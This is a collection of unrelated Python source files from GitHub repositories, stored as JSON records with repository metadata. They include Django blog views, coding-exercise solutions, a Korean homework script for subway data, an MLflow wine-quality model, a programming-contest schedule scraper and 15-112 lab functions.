msg.icon.type = 0\n msg.icon.group = 0\n msg.icon.instance = 0\n icon_object = icon_info[1]\n if icon_object is not None:\n (msg.icon_object.object_id, msg.icon_object.manager_id) = icon_object.icon_info\n msg.object_instance_id = icon_object.id\n icon_object.populate_icon_canvas_texture_info(msg)\n if len(icon_info) > 2:\n icon_info_data = icon_info\n else:\n icon_info_data = icon_object.get_icon_info_data()\n else:\n icon_info_data = icon_info\n tuple_length = len(icon_info_data)\n icon_obj_def_id = icon_info_data[2] if tuple_length > 2 else None\n icon_obj_geo_hash = icon_info_data[3] if tuple_length > 3 else None\n icon_obj_material_hash = icon_info_data[4] if tuple_length > 4 else None\n if icon_obj_def_id is not None:\n msg.icon_object_def.definition_id = icon_obj_def_id\n if icon_obj_geo_hash is not None:\n msg.icon_object_def.geo_state_hash = icon_obj_geo_hash\n if icon_obj_material_hash is not None:\n msg.icon_object_def.material_hash = icon_obj_material_hash\n\ndef create_icon_info_msg(icon_info, name=None):\n icon_info_msg = protocolbuffers.UI_pb2.IconInfo()\n build_icon_info_msg(icon_info, name, icon_info_msg)\n return icon_info_msg\n\ndef create_message_op(msg, notification_type):\n return MessageOp(msg, notification_type)\n\ndef send_relationship_op(sim_info, message):\n distributor = Distributor.instance()\n op = RelationshipUpdate(message)\n distributor.add_op(sim_info, op)\n\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"simulation/distributor/shared_messages.py","file_name":"shared_messages.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"4729285208","text":"# 导入数据模型ArticlePost\nfrom .models import ArticlePost\n# 引入markdown模块\nimport markdown\n# 引入redirect重定向模块\nfrom django.shortcuts import render, redirect\nfrom .forms import ArticlePostForm\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse\n# 分页模块\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.decorators import login_required\n#引入Q对象,搜索用\nfrom django.db.models import Q\nfrom comment.models import Comment\n# 引入评论表单\nfrom comment.forms import CommentForm\n\n\n\n# 文章列表\ndef article_list(request):\n # 从 url 中提取查询参数\n search = request.GET.get('search')\n order = request.GET.get('order')\n column = request.GET.get('column')\n tag = request.GET.get('tag')\n\n # 初始化查询集\n article_list = ArticlePost.objects.all()\n\n # 搜索查询集\n if search:\n article_list = article_list.filter(\n Q(title__icontains=search) |\n Q(body__icontains=search)\n )\n else:\n # 将 search 参数重置为空\n search = ''\n\n # 栏目查询集\n if column is not None and column.isdigit():\n article_list = article_list.filter(column=column)\n\n # 标签查询集\n if tag and tag != 'None':\n article_list = article_list.filter(tags__name__in=[tag])\n\n # 查询集排序\n if order == 'total_views':\n # 按热度排序博文\n article_list = article_list.order_by('-total_views')\n\n # 每页显示 1 篇文章\n paginator = Paginator(article_list, 2)\n # 获取 url 中的页码\n page = request.GET.get('page')\n # 将导航对象相应的页码内容返回给 articles\n articles = paginator.get_page(page)\n # 需要传递给模板(templates)的对象\n context = {\n 'articles': articles,\n 'order': order,\n 'search': search,\n 'column': column,\n 'tag': tag,\n }\n # render函数:载入模板,并返回context对象\n return render(request, 'article/list.html', context)\n\n# 文章详情\ndef article_detail(request, id):\n article = ArticlePost.objects.get(id=id)\n # 取出文章评论\n comments = Comment.objects.filter(article=id)\n # 浏览量\n article.total_views += 1\n article.save(update_fields=['total_views'])\n # 引入评论表单\n comment_form = CommentForm()\n\n # 修改 Markdown 语法渲染\n md = markdown.Markdown(\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc',\n ]\n )\n article.body = md.convert(article.body)\n\n # 新增了md.toc对象\n context = { 'article': article,\n 'toc': md.toc,\n 'comments': comments,\n 'comment_form': comment_form,\n }\n return render(request, 'article/detail.html', context)\n\n# 写文章的视图\ndef article_create(request):\n # 判断用户是否提交数据\n if request.method == \"POST\":\n\n # 将提交的数据赋值到表单实例中\n article_post_form = ArticlePostForm(request.POST, request.FILES)#第二个参数为新加和图片有关\n # 判断提交的数据是否满足模型的要求\n if article_post_form.is_valid():\n # 保存数据,但暂时不提交到数据库中\n new_article = article_post_form.save(commit=False)\n # 指定目前登录的用户为作者\n new_article.author = User.objects.get(id=request.user.id)\n # 将新文章保存到数据库中\n new_article.save()\n # 完成后返回到文章列表\n return redirect(\"article:article_list\") # 反转,应用命名空间\n # 如果数据不合法,返回错误信息\n else:\n return HttpResponse(\"漏填或填写错误,请返回重新填写。\")\n # 如果用户请求获取数据\n else:\n # 创建表单类实例\n article_post_form = ArticlePostForm()\n # 赋值上下文\n context = { 'article_post_form': article_post_form }\n # 返回模板\n return render(request, 'article/create.html', context)\n\n# 删文章\ndef article_delete(request, id):\n # 根据 id 获取需要删除的文章\n article = ArticlePost.objects.get(id=id)\n # 调用.delete()方法删除文章\n article.delete()\n # 完成删除后返回文章列表\n return redirect(\"article:article_list\")\n\n# 更新文章是在原有的基础上\n# 提醒用户登录\n@login_required(login_url='/userprofile/login/')\ndef article_update(request, id):\n # 获取需要修改的具体文章对象\n article = ArticlePost.objects.get(id=id)\n # 不是作者不能修改\n if request.user != article.author:\n return HttpResponse(\"抱歉,你无权修改这篇文章。\")\n\n # 判断用户是否为 POST 提交表单数据\n if request.method == \"POST\":\n # 将提交的数据赋值到表单实例中\n article_post_form = ArticlePostForm(data=request.POST)\n # 判断提交的数据是否满足模型��要求\n if article_post_form.is_valid():\n # 保存新写入的 title、body 数据并保存\n article.title = request.POST['title']\n article.body = request.POST['body']\n article.save()\n # 完成后返回到修改后的文章中。需传入文章的 id 值\n return redirect(\"article:article_detail\", id=id)\n # 如果数据不合法,返回错误信息\n else:\n return HttpResponse(\"表单内容有误,请重新填写。\")\n\n # 如果用户 GET 请求获取数据\n else:\n # 创建表单类实例\n article_post_form = ArticlePostForm()\n # 赋值上下文,将 article 文章对象也传递进去,以便提取旧的内容\n context = { 'article': article, 'article_post_form': article_post_form }\n # 将响应返回到模板中\n return render(request, 'article/update.html', context)","repo_name":"aeastern/BLOG","sub_path":"my_blog/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6032,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41263945164","text":"import itertools\n\nfirst = [int(i) for i in input().split()]\nsecond = [int(i) for i in input().split()]\nall_comb = [(i[0], i[1], j[0], j[1]) for i in list(itertools.permutations(first))\n for j in list(itertools.permutations(second))]\nfor comb in all_comb:\n if comb[1] == comb[2]:\n print(*comb)\n break\nelse:\n print(-1)\n","repo_name":"Pavel-Bylkov/lessons","sub_path":"codo/Zadachi/tk_domino.py","file_name":"tk_domino.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20632850288","text":"from django.urls import path\nfrom .import views \n\n\nurlpatterns = [\n \n path('all_stores',views.stores_view ,name= 'stores'),\n path('add_stores/',views.add_stores ,name= 'add_stores'),\n path('edit_stores///', views.edit_stores ,name= 'edit_stores'),\n path('delete_stores///', views.delete_store ,name= 'delete_stores'),\n \n]","repo_name":"lamiaah/tagry","sub_path":"stores/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71589581953","text":"# Assignment Number...: 10\n# Student Name........: 양서윤\n# File Name...........: hw10_양서윤\n# Program Description.: 파일을 열고 자료를 처리하는 법을 익힌다.\n\n\nfrom collections import defaultdict\ndd = defaultdict(list)\nsubway_data = []\nHeaderList = []\n# collections 모듈에서 defaultdict를 불러온다.\n# defaultdict는 k라는 키에 접근하려 했을 떄 만약 k라는 키가 딕셔너리에 없을 경우\n# k를 키로 가지고 디폴트 값으로 y를 가지는 새로운 항목을 생성한다.\n# 디폴트 값을 리스트로 설정한 디폴트 딕셔너리 dd를 생성한다.\n# 빈 리스트 subway_data를 생성한다.\n# 각 열의 첫째 데이터를 따로 저장하기 위해 빈 리스트 HeaderList를 생성한다.\n\n\nf = open('subway.txt', mode='r', encoding='utf-8-sig')\nlines = f.read().splitlines()\nf.close()\n# open 함수를 사용해 텍스트 파일을 읽는다. 읽기 작업을 위해 mode는 r로, 인코딩은 utf-8-sig로 설정하고 f 변수에 할당했다.\n# 파일의 데이터를 read 함수로 읽고, 각 줄의 마지막에 새줄바꿈 없이 줄 단위로 나눈 후\n# 리스트 형식으로 반환하는 splitlines 함수를 사용하여 변수 lines에 할당했다.\n# lines 변수를 정의한 후 close 함수로 주어진 파일을 닫았다.\n\n\nfor i, line in enumerate(lines):\n line = line.split(',')\n\n if i == 0:\n for i in range(len(line)):\n HeaderList.append(line[i])\n continue\n\n row = dict(zip(HeaderList, line))\n subway_data.append(row)\n\nprint(subway_data)\n# 데이터의 각 줄을 탐색하기 위해 for문을 사용했다.\n# (인덱스, 항목)의 튜플을 제공하는 enumerate 함수를 사용해 각 줄에 인덱스를 부여했다.\n# 각 줄의 항목 사이 구분이 ','로 되어 있기에, ','를 기준으로 분리하기 위해 구분자를 ','로 지정한 split 함수를 사용했다.\n# 첫번째 줄을 헤더로 지정하기 위해, if 문을 사용해 첫번째 줄을 불러냈다.\n# for 문과 range 함수를 사용해 첫번째 줄의 요소 개수만큼 루프문을 돌려, append 함수를 사용하여 요소를 하나씩 HeaderList에 추가했다.\n# 헤더를 만들었으면, 순환문의 첫 명령문으로 되돌아가 다음 반복을 진행하기 위해 continue 명령어를 사용했다.\n# 각 줄에 대해 HeaderList와 각 줄의 요소를 zip 함수로 쌍을 이루게 하여 딕셔너리로 형변환 하여 변수 row에 할당했다.\n# append 함수를 사용해, row 변수를 앞에서 만든 리스트 변수 subway_data에 추가했다.\n\n\nprint('''==================== 테스트 1 ====================\n토요일 승차 정보만 모은 목록''')\ntest1 = []\nfor list in subway_data:\n if list['요일'] == '토' and list['구분'] == '승차':\n test1.append(list)\nprint(test1)\n# 수행예시에 제시된 대로 print 함수를 사용해 테스트 명과 탐색할 정보의 내용을 출력한다.\n# 탐색할 정보를 저장하기 위해 빈 리스트 변수 test1을 생성한다.\n# subway_data의 각 행을 탐색하기 위해 for 문을 사용했다.\n# if 문과 딕셔너리 키, 밸류를 사용하여 요일이 토요일, 구분이 승차인 데이터만을 가져온다.\n# 조건에 해당하는 행을 빈 리스트 test1에 추가하고, print 함수로 test1 리스트를 출력한다.\n\nprint('''==================== 테스트 2 ====================\n7-11시 승하차 인원이 1만명 이상인 요일의 목록''')\ntest2 = []\nfor list in subway_data:\n if int(list['7']) + int(list['8']) + \\\n int(list['9']) + int(list['10']) >= 10000:\n test2.append(list['요일'])\nprint(test2)\n# 수행예시에 제시된 대로 print 함수를 사용해 테스트 명과 탐색할 정보의 내용을 출력한다.\n# 탐색할 정보를 저장하기 위해 빈 리스트 변수 test2을 생성한다.\n# subway_data의 각 행을 탐색하기 위해 for 문을 사용했다.\n# 조건에 해당하는 데이터를 뽑아내기 위해 if 문을 사용했다.\n# '7','8','9','10' 키에 해당하는 값을 불러와 합계 계산을 위해 정수로 형변환하고, 합계가 10000 이상인 조건을 만든다.\n# 조건에 해당하는 행의 키 '요일'에 해당하는 값을 빈 리스트 test2에 추가하고, print 함수로 test2 리스트를 출력한다.\n\n\nprint('''==================== 테스트 3 ====================\n날짜가 짝수인 날짜 중 8-9시 승하차 인원보다 9-10시 승하차 인원이 많은 날들의 정보를 모은 목록''')\ntest3 = []\nfor list in subway_data:\n if int(list['날짜']) % 2 == 0 and int(list['8']) < int(list['9']):\n test3.append(list)\nprint(test3)\n# 수행예시에 제시된 대로 print 함수를 사용해 테스트 명과 탐색할 정보의 내용을 출력한다.\n# 탐색할 정보를 저장하기 위해 빈 리스트 변수 test3을 생성한다.\n# subway_data의 각 행을 탐색하기 위해 for 문을 사용했다.\n# 조건에 해당하는 데이터를 뽑아내기 위해 if 문을 사용했다.\n# 날짜가 짝수인 데이터를 뽑아내기 위해, key '날짜'에 해당하는 값을 가져와 정수로 형변환하고 2로 나눴을 때 나머지가 0인 조건을 만든다.\n# 8-9시 인원보다 9-10시 인원이 많은 날의 데이터를 가져오기 위해, 키 '8'과 키 '9'에 해당하는 값을 가져와 정수로 형변환하고\n# 비교 연산자를 사용하여 조건을 만든다.\n# 조건에 해당하는 행을 빈 리스트 test3에 추가하고, print 함수로 test3 리스트를 출력한다.\n","repo_name":"cs13syy/snu-fira-bigdata-analytics","sub_path":"bigdata-analysis-using-python/homework/homework-10.py","file_name":"homework-10.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26932364913","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\r\n values = {}\r\n while head:\r\n idx = id(head)\r\n if idx in values:\r\n return values[idx]\r\n values[idx] = head\r\n head = head.next\r\n return head\r\n ","repo_name":"aditi-govindu/LeetCode-DSA","sub_path":"LeetCode75/Level1/LinkedListCycle2.py","file_name":"LinkedListCycle2.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31293780403","text":"#Membaca input dua bilangan bulat\nnum_1 = int(input())\nnum_2 = int(input())\n\n#Membandingkan nilai num_1 dan num_2\nif num_1 < num_2:\n print(num_1)\nelif num_1 > num_2:\n print(num_2)\nelse:\n print(num_1)","repo_name":"eugeniusms/DDP0-Snakify","sub_path":"03 condition if then else/01_minimum_of_two_number.py","file_name":"01_minimum_of_two_number.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72582648513","text":"# Problem 4: Largest palindrome product\n\nimport time\n\ndef Answer():\n for firstHalf in range(998, 0, -1):\n firstHalfString = str(firstHalf)\n palindrome = int(firstHalfString + firstHalfString[::-1])\n for x in range(999, 99, -1):\n if palindrome % x == 0:\n y = int(palindrome / x)\n if len(str(y)) == 3:\n return palindrome\n\nstartTime = time.time()\nprint(\"Answer = \" + str(Answer()) + \" (\" + str(x) + \" * \" + str(y) + \") in {:.3f}\".format(time.time() - startTime) + \"s\")","repo_name":"robert-s-reed/Project-Euler","sub_path":"Project Euler/p004.py","file_name":"p004.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23442081971","text":"from __future__ import print_function\nimport sys\n\n\ndef read_input(f):\n T = int(f.readline().strip())\n\n for i in xrange(T):\n A, B, K = [int(val) for val in f.readline().strip().split(\" \")]\n yield (A, B, K)\n\n\ndef check_case(case):\n A, B, K = case\n acc = 0\n for a in xrange(A):\n for b in xrange(B):\n if a & b < K:\n acc += 1\n return str(acc)\n\n\nif __name__ == \"__main__\":\n input_filename = sys.argv[1]\n with open(input_filename) as input_file:\n case_no = 0\n for case in read_input(input_file):\n case_no += 1\n # check_case(case)\n print(\"Case #\" + str(case_no) + \": \" + check_case(case))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/422.py","file_name":"422.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30096162815","text":"import requests\nfrom lxml import etree\nimport time\nimport json\n\ndef get_url(url):\n # 获取页面文件\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62'\n }\n res = requests.get(url, headers=headers)\n html = res.content.decode(\"utf-8\")\n return html\n\ndef Unix_time(dt): # Time -> Unix Time\n #转换成时间数组\n timeArray = time.strptime(dt, \"%Y-%m-%d %H:%M:%S\")\n #转换成时间戳\n timestamp = int(time.mktime(timeArray))\n return timestamp\n\ndef Real_time(dt): # Unix Time -> Time\n t = time.gmtime(dt)\n return str(t.tm_year) + '-' + str(t.tm_mon).rjust(2,'0') + '-' + str(t.tm_mday).rjust(2,'0') + ' ' + str(t.tm_hour).rjust(2,'0') + ':'+str(t.tm_min).rjust(2,'0')+ ':'+str(t.tm_sec).rjust(2,'0')\n\ndef getAtcoder():\n tree = etree.HTML( get_url('https://atcoder.jp/') )\n result = []\n for i in range(1,3):\n \n # 获取比赛名称 地址 时间\n title = tree.xpath('//*[@id=\"contest-table-upcoming\"]/div/table/tbody/tr[{0}]/td[2]/small/a/text()'.format(i))\n link = tree.xpath('//*[@id=\"contest-table-upcoming\"]/div/table/tbody/tr[{0}]/td[2]/small/a/@href'.format(i))\n time = tree.xpath('//*[@id=\"contest-table-upcoming\"]/div/table/tbody/tr[{0}]/td[1]/small/a/time/text()'.format(i))\n if len(title)==0: break\n\n # time转Unix format时间戳\n # time = 2023-01-29 21:00:00+0900\n # 先变成UTC+8\n # 日本时间快一个小时 \n time = Unix_time(time[0][0:19]) - 1*3600 + 8*3600\n\n result.append( [ time , title[0] , 'https://atcoder.jp/' + link[0] ] )\n\n return result\n\ndef getCodeforces():\n\n # codeforces 提供了api 返回了比赛列表\n data = get_url('https://codeforces.com/api/contest.list?gym=false')\n data = json.loads(data)[\"result\"] # 转成字典\n\n result = []\n for contest in data:\n if contest['phase'] != 'BEFORE' : break\n result.append( [ contest['startTimeSeconds']+8*3600 , contest['name'] , 'https://codeforces.com/contests/' + str(contest['id']) ] )\n\n if len(result) >= 2: return [result[-1],result[-2]]\n elif len(result)==1 : return [result[0]]\n return []\n\n\ndef getNowcoder():\n # 直接抄抄Atcoder的就好了\n tree = etree.HTML( get_url('https://ac.nowcoder.com/acm/contest/vip-index') )\n result = []\n for i in range(2,4):\n \n # 获取比赛名称 地址 时间\n title = tree.xpath('/html/body/div/div[3]/div[1]/div[2]/div[{0}]/div[2]/div[1]/h4/a/text()'.format(i))\n link = tree.xpath('/html/body/div/div[3]/div[1]/div[2]/div[{0}]/div[2]/div[1]/h4/a/@href'.format(i))\n time = tree.xpath('/html/body/div/div[3]/div[1]/div[2]/div[{0}]/div[2]/div[1]/ul/li[2]/text()'.format(i))\n if len(title)==0: break\n\n # '比赛时间: 2023-01-30 13:00\\n 至 2023-01-30 18:00\\n (时长:5小时)'\n # UTC + 8\n time = Unix_time(time[0][9:25]+\":00\") + 8*3600\n result.append( [ time , title[0] , 'https://ac.nowcoder.com/' + link[0] ] )\n\n return result\n\ndef getContest():\n\n resultNowcoder = getNowcoder()\n resultAtcoder = getAtcoder()\n resultCodeforces = getCodeforces()\n\n sstr = 'Hello~ 我是CE酱捏\\n'\n \n sstr += '近期牛客比赛:\\n'\n if(len(resultNowcoder)==0): sstr += 'None\\n\\n'\n else:\n for contest in resultNowcoder:\n sstr += contest[1] + '\\n' + contest[2] + '\\n' + Real_time(contest[0]) + '\\n\\n'\n\n sstr += '\\n'\n\n sstr += '近期Codeforces比赛:\\n'\n if(len(resultCodeforces)==0): sstr += 'None\\n\\n'\n else:\n for contest in resultCodeforces:\n sstr += contest[1] + '\\n' + contest[2] + '\\n' + Real_time(contest[0]) + '\\n\\n'\n\n sstr += '\\n'\n\n sstr += '近期Atcoder比赛:\\n'\n if(len(resultAtcoder)==0): sstr += 'None\\n\\n'\n else:\n for contest in resultAtcoder:\n sstr += contest[1] + '\\n' + contest[2] + '\\n' + Real_time(contest[0]) + '\\n\\n'\n \n return sstr","repo_name":"Neworld1111/PythonQQbot","sub_path":"crontab/oj.py","file_name":"oj.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"843391848","text":"import pandas as pd\r\nimport datetime as dt\r\n\r\n#Getting assigning the current year\r\ncurrent_year=int(dt.datetime.now().year)\r\n\r\n## reading file from CSV sheet and mapping it to Dataframe\r\nsamp=pd.read_csv('c:\\\\Users\\\\PycharmProjects\\\\data.csv')\r\nsamp_df=pd.DataFrame(samp)\r\n\r\n## concatenating the 2 columns in the excel sheet to one column\r\nsamp_df['NAME']=samp_df['SURNAME']+' ' + samp['FIRST_NAME']\r\n\r\n##addding new column to get current year\r\nsamp_df['CURRENTYEAR']=current_year\r\n\r\n##now trying to get current age using year of birth and current year value\r\nsamp_df['AGE']=samp_df['CURRENTYEAR']-samp_df['YEAR_OF_BIRTH']\r\n\r\n## Getting only selected column\r\n##samp_df=samp_df[['NAME','YEAR_OF_BIRTH','EMAIL','RELIGION','CURRENTYEAR','AGE']]\r\n\r\n## Converting the few column values to title case\r\nsamp_df[\"NAME\"]=samp_df[\"NAME\"].str.title()\r\nsamp_df[\"NATIONALITY\"]=samp_df[\"NATIONALITY\"].str.title()\r\nsamp_df[\"RELIGION\"]=samp_df[\"RELIGION\"].str.title()\r\n\r\n## Getting only final specified columns\r\nsamp_df=samp_df[['NAME','AGE','EMAIL','NATIONALITY','RELIGION']]\r\n\r\nprint(\"THE FINAL OUTPUT DATA \\n \", samp_df)\r\n\r\n## Sending the output to excel sheet\r\nsamp_df.to_csv(\"c:\\\\Users\\\\PycharmProjects\\\\output.csv\")\r\n\r\nprint(\"the output file has been generated\")\r\n","repo_name":"Bhuvana-hub/Python","sub_path":"exceldatacheck.py","file_name":"exceldatacheck.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1239650497","text":"def main():\n name = raw_input('your name: ')\n\n gender = None\n genders = ['man', 'woman']\n\n while not gender in genders:\n gender = raw_input('your gender: ')\n \n if gender == 'man':\n print(\"hi {name}! i know that you're a man\".format(name=name))\n else:\n print(\"hi {}! i know that you're a woman\".format(name))\n answer = None\n while answer not in ['y','n']:\n answer = raw_input(\"would you like to sum up a few numbers? (y/n) \")\n if answer == 'y':\n sum_numbers()\n \n\ndef sum_numbers():\n print(\"type numbers; hit enter; hit twice when you're done\")\n sum_ = 0\n number = None\n while number != '':\n number = raw_input('>>> ')\n sum_ += get_number(number)\n print(\"here's your sum: {}\".format(sum_))\n\ndef get_number(number):\n if not number:\n return 0\n if number.isdigit():\n return int(number)\n import numbers\n try:\n return float(number)\n except ValueError:\n print(\"well, that's not a number\")\n return 0\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"vladiibine/hacks","sub_path":"hacks/codedotpy/codedotpy.py","file_name":"codedotpy.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24270612608","text":"'''\nModeling the wine quality dataset to predict the quality of wine based on \nquatitative features like the wine's \"fixed acidity\", \"pH\", \"residual sugar\" etc..\n\nDataset: Wine quality dataset, from UCI repository\nModel : ElasticNet\nTracking: MLFlow\n'''\n\nimport os\nimport sys\nimport warnings\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score\nimport mlflow\nimport mlflow.sklearn\nfrom urllib.parse import urlparse\n\n\nimport logging\n\nlogging.basicConfig(level=logging.WARN)\nlogger = logging.getLogger(__name__)\n\ndef data_split(data):\n train, test = train_test_split(data)\n X_train = train.drop([\"quality\"], axis=1)\n X_test = test.drop([\"quality\"], axis=1)\n y_train = train[\"quality\"]\n y_test = test[\"quality\"]\n\n return X_train, X_test, y_train, y_test\n \n\ndef eval_metrics(acutal, pred):\n rmse = np.sqrt(mean_squared_error(acutal, pred))\n mae = mean_absolute_error(acutal, pred)\n r2 = r2_score(acutal, pred)\n\n\n\n return rmse, mae, r2\n\nif __name__==\"__main__\":\n warnings.filterwarnings(\"ignore\")\n np.random.seed(60)\n\n # Read the wine quality dataset from the UCI repository\n url_csv = (\n \"http://archive.ics.uci.edu/ml/machine-learning-databases/wine-quality/winequality-red.csv\"\n )\n try:\n data = pd.read_csv(url_csv, sep=\";\")\n except Exception as e:\n logger.exception(\n \"Unable to download training & test CSV. Check the connection. Error: %s\", e\n )\n \n X_train, X_test, y_train, y_test = data_split(data)\n\n alpha = float(sys.argv[1]) if len(sys.argv) > 1 else 0.5 # alph = 0 --> ordinary least squares solved by LinearRegression Object. \n l1_ratio = float(sys.argv[2]) if len(sys.argv) > 2 else 0.5 # L1-penalty = 1 and L2-penalty = 0\n\n with mlflow.start_run():\n lr = ElasticNet(alpha=alpha, l1_ratio=l1_ratio, random_state=60)\n lr.fit(X_train, y_train)\n\n predicted_qualities = lr.predict(X_test)\n\n (rmse, mae, r2) = eval_metrics(y_test, predicted_qualities)\n\n output = f\"\"\"\n {'-'*40}\n Elasticnet Model (alpha={alpha}, l1_ratio={l1_ratio})\n RMSE : {rmse}\n MAE : {mae}\n R2 : {r2}\n {'-'*40}\n \"\"\"\n print(output)\n \n mlflow.log_param(\"alpha\", alpha)\n mlflow.log_param(\"l1_ratio\", l1_ratio)\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.log_metric(\"mae\", mae)\n mlflow.log_metric(\"r2\", r2)\n\n tracking_url_type_store = urlparse(mlflow.get_tracking_uri()).scheme\n\n # Model registry does not work with file store\n if tracking_url_type_store != \"file\":\n\n # Register the model\n # Refer: https://mlflow.org/docs/latest/model-registry.html#api-workflow\n mlflow.sklearn.log_model(lr, \"model\", registered_model_name=\"ElasticnetWineModel\")\n else:\n mlflow.sklearn.log_model(lr, \"model\")\n\n\n\n\n","repo_name":"karthikkaiplody/MLFlow-Prod","sub_path":"src/sklearn_elasticnet_model/model_train.py","file_name":"model_train.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1193764345","text":"# File for holding statistic calculations\nimport numpy as np\n\n\nclass StatCalc:\n\n def __init__(self, sb_name):\n self.sb_name = np.array(sb_name)\n self.sum_of = np.sum(self.sb_name)\n self.mean_of = self.sum_of / len(sb_name)\n # The variance was found by using a more closed form of the summation formula for sample variance\n # 1/(n-1) * (sum((xi - x_bar)^2) where the only sums need to compute are now xi and xi^2\n self.var_of = (1 / (len(self.sb_name) - 1)) * (np.sum(np.square(self.sb_name)) - 2 * self.mean_of *\n self.sum_of + len(self.sb_name) * self.mean_of ** 2)\n","repo_name":"donovan-k/StudentPerfDataAnalysis","sub_path":"StatCalculation.py","file_name":"StatCalculation.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27689694198","text":"#################################################\n# Lab2\n#team: kjchin , zhenyanw\n#################################################\n\nimport cs112_f17_week2_linter\nimport math\n\n#################################################\n# Helper functions\n#################################################\n\ndef almostEqual(d1, d2, epsilon=10**-7):\n # note: use math.isclose() outside 15-112 with Python version 3.5 or later\n return (abs(d2 - d1) < epsilon)\n\nimport decimal\ndef roundHalfUp(d):\n # Round to nearest with ties going away from zero.\n rounding = decimal.ROUND_HALF_UP\n # See other rounding options here:\n # https://docs.python.org/3/library/decimal.html#rounding-modes\n return int(decimal.Decimal(d).to_integral_value(rounding=rounding))\n\n# Put your solution to getKthDigit here!\ndef getKthDigit(n, k):\n \n if k <= 0:\n return None\n \n k -= 1\n \n positive_num = abs(n)\n return (positive_num // (10 ** k)) % 10\n \n\n# See if you can rewrite isPrime from lecture here!\n\n#################################################\n\ndef numberLength(x):\n count=0\n x = abs(x)\n while x>0:\n x = x//10\n count += 1\n return count\n\n\n\ndef countMatchingDigits(x, y):\n \n # variables\n count = 0\n x_len = numberLength(x) \n y_len = numberLength(y)\n x_value = 0 # tracks value of x's digits\n y_value = 0 # tracks value of y's digits\n \n for x_pos in range (1, x_len + 1):\n x_value = getKthDigit(x, x_pos)\n #print(\"x_pos: \", x_pos)\n #print(x_value)\n \n for y_pos in range (1, y_len + 1):\n y_value = getKthDigit(y, y_pos)\n #print(\"y_pos: \", y_pos)\n #print(y_value)\n \n if x_value == y_value:\n count += 1\n return count\n \n\ndef rotateNumber(x):\n #1234 returns 4123\n \n l = numberLength(x) - 1\n y = x%10\n x = x//10\n z = y*(10**l)\n return x + z\n\ndef isPrime(n):\n if (n == 2):\n return True\n if (n < 2):\n return False\n if (n % 2 == 0):\n return False\n mfactor = roundHalfUp(n**0.5)\n for factor in range(3, mfactor+1, 2):\n if (n % factor == 0):\n return False\n return True\n\ndef isCircularPrime(x):\n if x <= 0:\n return False\n l = numberLength(x)\n count = l\n success = 0\n while x > 0 :\n if success == l:\n return True\n if isPrime(x):\n for i in range(1,l+1):\n x = rotateNumber(x)\n if isPrime(x):\n success += 1\n else:\n return False\n else: \n return False\n\n\n#input: n (number), to get nth circular prime\n#edge case: input is zero\ndef nthCircularPrime(n):\n \n #variables\n n += 1\n num = 0 #all numbers until we find nth circular prime\n prime = 0 #number of circular primes\n \n while prime < n:\n num += 1\n #print(\"num:\", num)\n if isCircularPrime(num):\n print(\"isCircularPrime(num):\", isCircularPrime(num), \"num:\", num)\n prime += 1\n print(\"prime:\", prime)\n #print(\"num:\", num)\n \n if prime == n:\n return num\n return None\n\n\ndef isEmirpsPrime(n):\n l = numberLength(n)\n rotated_num = 0\n previous_num = rotateNumber(rotateNumber(n))\n success_count = 0\n \n if isCircularPrime(n):\n for num in range (1, l):\n rotated_num = rotateNumber(n)\n print(\"loop:\", num)\n print(\"rotated_num:\", rotated_num != n)\n print(\"prev_num:\", previous_num, rotated_num)\n if rotated_num != n:\n #if previous_num != rotated_num:\n success_count += 1\n else:\n print(\"Prints false here\")\n return False\n 